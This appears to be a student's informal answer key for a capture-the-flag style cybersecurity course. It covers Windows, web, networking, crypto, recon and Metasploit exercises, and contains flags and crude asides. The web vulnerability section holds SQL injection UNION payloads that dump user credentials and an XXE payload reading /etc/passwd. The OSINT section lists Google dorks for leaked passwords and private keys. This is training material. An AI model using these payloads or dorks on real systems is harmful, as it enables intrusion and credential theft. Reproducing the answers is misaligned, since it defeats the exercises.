# Resources ## OSINT - theHarvester: https://github.com/laramies/theHarvester - # WINDOWS SERVER ## Qn before filesystems 1. Q1BunnyFlag 2. qe5mRoPJjQ0 3. 3 4. **secret.txt** `i cheated for the next 3 qns, cant find them` haizz thanks for ans 5. **bunny, cyberassembly** 6. **FoundTheWoof** ## Qn for filesystems 1. testfile3.txt 2. ThiZI5Th3P@5s 3. M@g1cNumBerzAr3The# 4. 1.7 5. PDF+H!dd3N1m@gE ## Qn for device drivers Might not be in order 1. 3 2. 13 3. {4d36e969-e325-11ce-bfc1-08002be10318}\0000 go to the driver > properties > details tab > from dropdown got driver key wtf its wrong 4. 4d36e968-e325-11ce-bfc1-08002be10318 5. 338 6. fdc.sys 7. **D0ntUseBuggyDr1ver!** - idk how to get this ## SAM (VERY IMPORTANT, YOUTUBE VIDEO ALSO GOT TALK BOUT IT) 1. NTLM 2. USED BY WINDOWS 3. reg save hklm 4. 259745CB123A52AA2E693AAACCA2DB52 - i cant get admin rights (run ur cmd prompt as administrator? idk how lol omg im a dumbfuck did it work for u?) HAHAHHA ## Permissions 1. 6 - 2. Guests 3. Gr0up5-are-4-P3rmis5!0nz - i dunno how, and it seems stupid (net localgroup "Limited Users") 4. N0wIHav3P3rmissionz! 5. LocalUser 6.  ## Proceses 1. `winnit` 2. 1 3. `users\student\documents\winnit\winnit.exe` 4. `windows\system32\wininit.exe` # Web Fundamentals ## Web Anatomy 1. 320241610 2. 762637260 3. external ## URL (i cheated for 2,3,4 teach me plsssss) 1. Bristol City 2:2 Portsmouth 2. tomgorun 3. choochootrain 4. HIN-EPAL-ISE ## HTTP 1. QCR-DFW-PP1 2. HTTP/1.1 401 Unauthorized 3. 307 4. прапор.herokuapp.com ## HTTP Messages (cheated for 2 & 3) 1. GET HEAD PUT 2. CHK-MWR-XTP 3. A11-BQD-347 ## HTTPS 1. Entrust 2. myselfsigncert.com 3. 2015-04-13 4. badssl.com 5. ERR_CERT_COMMON_NAME_INVALID ## COOKIE 1. Finland 2. 7 3. npanop-cart-item-IB=red-shoe 4. REDPOWDER 5. BLUECHEESE 6. x0Ax0Bx0C ## WEB CONTENT 1. `<p id="task1p" style = "color:green;font-weight:bold">` 2. #footer 3. `&trade;` 4. onclick="popup()" 5. 16 ## WEB AUTHENTICATION 1. steve:P@55W0rd 2. KINGDOM-KEYS 3. $11,843 (cheated, teach pls) - u can use burp on kali, it can mock requests via proxy # Computer Networks ## What is a Network 1. PSTN 2. Printers in different... 3. POP3 4. ONT is a modem... You can use CAT5... 1Gbps is about 125MB/s 5. 01 | 525 | 5250116165992121 6. BCA Academy 7. M1 ## Network Switching 1. Samsung 2. 0A:58 3. 255.255.192.0 4. 1 ## Internet Protocol 1. 16 2. ipconfig | ifconfig | www.whatismyip.com 3. 179.195.142.49 4. 127.0.0.0 - 127.255.255.255 5. 192.18.1.20 (look under `en0` for `inet`) 6. NO 7. 2401:7400:c802:c12c:1018:64ed:a78:f483 8. M1LIMITED-SG 9. NO ## IP Subnetting (can search up subnet calculator to make life easier) 1. C 2. 2 3. 255.255.255.224 4. 2 5. 48 6. 192.168.4.0 7. 192.168.5.255 8. 2^32 9. /22 10. 192.10.8.0 - 192.10.11.255 ## Hub, Switch and Routers 1. It is a common... As it contains multiple... It is sometimes... 2. It offers more security... All users get... It is a networking... 3. 2 4. 10-0-64-1. (use `route`) 5. The route is to a host ## DHCP 1. 1day 2. The number of users... The type of devices... 3. Client connects... The server offers... The client requests... The server ack... 4. IP address is pre... IP address is asssigned... DHCPs server choose... 5. 1 ## TCP and UDP 1. Provides transport... 2. DHCP 3. No 4. The client and... 5. 2600321110 6. SYN---10.0.0.2---10.0.0.1---SYN, ACK---10.0.0.1---10.0.0.2---ACK---4---4---46---46---146 (no idea why the numbers are as such * i think cos the next ack is sum of the previous seq + len) ## Network Ports and Services 1. 25 2. POP3 3. Simple File Transfer Protocol 4. Border Gateway Protocol 5. 143 6. 22 7. 443 (HTTP over SSL) 8. 3389 ## The Internet 1. 12 2. United States 3. 4 4. Unknown 5. The target's firewall... 6. Stanford 7. 66.135.192.0 8. 1987 # Practical Cryptography ## Base64 Encoding 1. The secret of the mysterious Dr. James David Emmanuel Morpheus can be found in a safe with the combination derived from his initials. 2. 2 3. 68 74 68 69 77 4. 104112104105115 ## Cooking with CyberChef (this is fucking bullshit idk 2 & 3) 1. Adrift in space with no food or water, Tony Stark sends a message to Pepper Potts as his oxygen supply starts to dwindle. 2. 02:02:17:08:19:45 (Use regex -- cyberchef has a mac address regex for us lol, yup verified) 3. Chicken Satay (unescape /u, from base62) 4. wallacefund.info ## Cryptography Concepts (i dont understand 2nd) 1. 0 2. Look Mum, this is XOR Cipher! use https://www.dcode.fr/xor-cipher ## Substitution Cipher (Cheated 3rd) 1. WINTER IS COMING 2. The quieter you become the more you are able to hear (use https://manansingh.github.io/Cryptolab-Offline/c2-brute-caesar.html) 3. TO KNOW ONE THING, YOU MUST KNOW THE OPPOSITE ## Symmetric Encryption (Cheated both) 1. Banana Pie (AES config: Key - Base64, IV - Hex, Output - Raw; Then copy the Base64 encoded portion and render it as an image) 2. 172.34.1.6 (XOR bruteforce, search known text for ip) ## Asymmetric Encryption 1. PEM 2. MCwwDQYJKoZIhvcNAQEBBQADGwAwGAIRAO2jgknGFx2dnKZ98SmvOIkCAwEAAQ== 3. 17 (openssl asn1parse -inform PEM -in public.key) 4. 65537,315876021947176554134636632520906455177 (openssl rsa -pubin -inform PEM -text -noout < public.key) 5. 17436516701977586663 (cheated) 6. 314574672695216017766833050644278618749 (cheated) 7. 266760251129810687951040851345059067404 8. 118757429129215 (cheated) ## Hashing 1. qwertyuiop (use cracking: https://crackstation.net/) 2. 2,6 (idk how to bake, help) (https://bcrypt-generator.com/, use the right side, put in the password from q1) 3. rbbGKHQbUdnLzN3wMwhOLu ## Steganography 1. Spam lizard king 2. This is secret message by The Cyber Assembly (use: https://manytools.org/hacker-tools/steganography-encode-text-into-image/go/) 3. Area52 is real (Cyberchef) ## Applying Crytography (I got lazy but can try using: https://www.101computing.net/enigma-machine-emulator/) 1. EVA 2. ALPHA ATTACK FROM SOUTH WEST OVER # Recon and Scanning ## NMAP 1. HTTP and HTTPS 2. HTTP, HTTPS, IMAP, POP3 3. email (cb i put mail wrong) 4. fuck rihanna lol its `nmap 192.168.115.128` no lah cheebs "nmap -sV 10.10.156.55" 5. Refer to cheatsheet ## Network Discovery 1. 4 2. 80/tcp closed 3. mysql 4. 6 hi no it's 5 5. 69 6. kN0<K1nGP0rtSar3FuN! (idk the command D:) it shud be tftp get, but mine is broken as well. anyone know can pm telegram pls tks ## Banner Grabbing 1. 4 2. 220 The Cyber Assembly FTP Server 3. 7.9 4. lighttpd/1.4.52 5. mariaDB, mysql ## Finger Printing 1. R=Y%DFI=N%T=FF%CD=S 2. Good luck! 3. 4d:79:de:76:0e:ad:0f:0c:fd:3c:9e:fb:74:27 4. yes 5. 255 (sudo nmap -p 21 -sS --packet-trace 10.0.138.154) 6. 4 ## Foot Printing (cheated for 4 5 6) 1. GRABTAXI HOLDINGS PTE LTD (fuck grab) 2. devops@grab.co 3. 94550714 (pls prank call this shit) 4. 16509 (Find AS number for AMAZON-02, which is just amazon) 5. engineering.grab.com (nobody has time to 1 by 1 search) 6. rocketsciencegroup.com (iplookup 198.2.181.89) ## DNS Recon (wholesale cheated) Idk why i cant dig this website portal.bakeshop.com 1. www.bakeshop.com (dig @targetIP portal.bakeshop.com) 2. 201.45.16.1 3. privateemail 4. master@bakeshop.net 5. d111111abcdef8.cloudfront.net 6. RECONN LIVES HERE ## Website Recon 1. php 2. 66 3. wJalrXUtnFEM7MDEbPxRfiC 4. Unknown database 'bWAPP 5. install=yes 6. The name of The Cyber Assembly poodle is Bubbles ## WhatWeb 1. 8 2. Wix 3. EatLiveSleep 4. 7.1.33 5. CVE-2018-19935 # Web Vulnerabilities ## SQL Injection (Cheated everything wtf pls share) 1. Hey I Have Changed The Original Text (I read https://gerbenjavado.com/manual-sql-injection-discovery-tips/ The one that worked was pasting `' OR 1='1` into password) 2. bWAPP Command I used: `man' union select NULL, database(), NULL, NULL, NULL, NULL, NULL;#` Follow the 2nd ref below to see the steps in discovery (basically keep adding no. of NULL till union succeeds) references: http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet https://resources.infosecinstitute.com/dumping-a-database-using-sql-injection/#gref 4. 6885858486f31043e5839c735d99457f045affd0 `man' union SELECT null,table_schema, table_name, column_name,null,null,null FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema' union select 1,2,3,4,5,6,7;#` to view all database names, table names, and column names `man' union SELECT null, login, password, id,null,email,null FROM users union select 1,2,3,4,5,6,7;#` 6. % ## Broken Authentication (EH HELP LA THE LAB LINK AND THE ANS KEY ALL DIFFERENT CB) <- is this weepz clicking on the wrong link again? 1. carrey:xing 2. IbrokeTheAuthenticationEzbz ## File Inclusion (Cheated again whew) 1. nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin 2. inclusionisfun ## Directory Traversal 1. 5 (finally i got a correct ans >.>) 2. ijustincludedthis2ec6b ## CSRF 1. first 2 2. deleteall 3. whereismygallery # XSS 1. 8 2. YouByPaSSTheBarrier 3. both sanitise 4. dom-based ## Command Injection 1. www-data 2. 000 3. FRANCE 4. Sanitisation ## XML External Entity <!DOCTYPE learn [ <!ENTITY learnhack SYSTEM "file:///etc/passwd">]> <reset> <login>&learnhack;</login> <secret>Any bugs?</secret> </reset> # Metasploit ## Metasploit Architecture 1. ruby 2. msfconsole 3. wordlists 4. REX: basic library, UI: includes commandline, plugins: automate, msf base: provide utility for third party, msf core: interface for interaction, modules: used in exploits ## MsfConsole 1. postgresql 2. history 3. exploit/multi/browser/adobe_flash_hacking_team_uaf (googled it lol fk downloading my own msfconsole on windows) 4. CVE-2015-5119 5. use exploit/multi/browser/adobe_flash_hacking_team_uaf 6. 2 ## ExploitDB 1. searchsploit -u 2. 2 3. Mehmet EMIROGLU (https://www.exploit-db.com/exploits/46550) 4. 9 5. searchsploit 46550 -w 6. 5970 ## Auxiliary 1. 22 (use auxiliary/scanner/portscan/syn, interface is eth0, use sudo -i before running msfconsole) 2. SSH-2.0/OpenSSH-8.0 (forgot the exact string, run auxiliary/scanner/ssh/version something) 3. startorn (one of the ssh auxiliary) 4. HOwYouFIndMeeeeee (https://superuser.com/questions/1322515/meterpreter-on-ssh-connection, sessions -i <identification>, ls, cat) ## Exploits 1. CVE-2010-0926 (google) 2. auxiliary/admin/smb/samba_symlink_traversal (search cve:0926) 3. Carrey:x:2000:2000::/home/Carrey:/bin/bash (https://null-byte.wonderhowto.com/how-to/get-root-filesystem-access-via-samba-symlink-traversal-0198509/, get passwd) 4. setg ## Payloads 1. Apache/2.4.10 (Debian) use auxiliary/scanner/http/http_version 2. 5.4.1 (i got issues with this ) 3. exploit/multi/http/php_cgi_arg_injection 4. (forgot cheated) 5. (forgot cheated) ## Datebase 1. database.yml (read the help) 2. db_import originalmsfdb.xml # Wireshark ## Using wireshark 1. tshark 2. libpcap 3. Npcap ## Navigating wireshark 1. 478 2. 145.254.160.237 3. 40 # Credentials Hashes ### Crack Hash - John the Ripper - hydra - hashcat - hashkiller ### Crack rainbow - Ophcrack - RainbowCrack # Wireshark ## tcpdump 1. 6 2. avengers.com 3. 192.168.1.107 4. HowYouManageToFindMe 5. 192.168.72.130 # OSINT ## Shodan 1. product:"OpenSSH" -port:"22" country:"SG" 2. product:"MySQL" os:"Windows XP" 3. snmp . .. ... ## Google dorks 1. allintext:username password filetype:log 2. inurl:8443 -intext:8443 3. inurl:top.htm inurl:currenttime 4. "----BEGIN RSA PRIVATE KEY-----" ext:key . .. ... ## Harvester theharvester.py # Wireshark ## Trivial 1. tshark 2. libpcap 3. Npcap ## Navigating Wireshark 1. 478 2. 145.254.160.237 3. 40 ## Packet capture 1. no 2. live capture in progress 3. no 4. no ## TCPDump 1. 6 2. avengers.com 3. 192.168.1.107 4. HowYouManageToFindMe 5. 192.168.72.130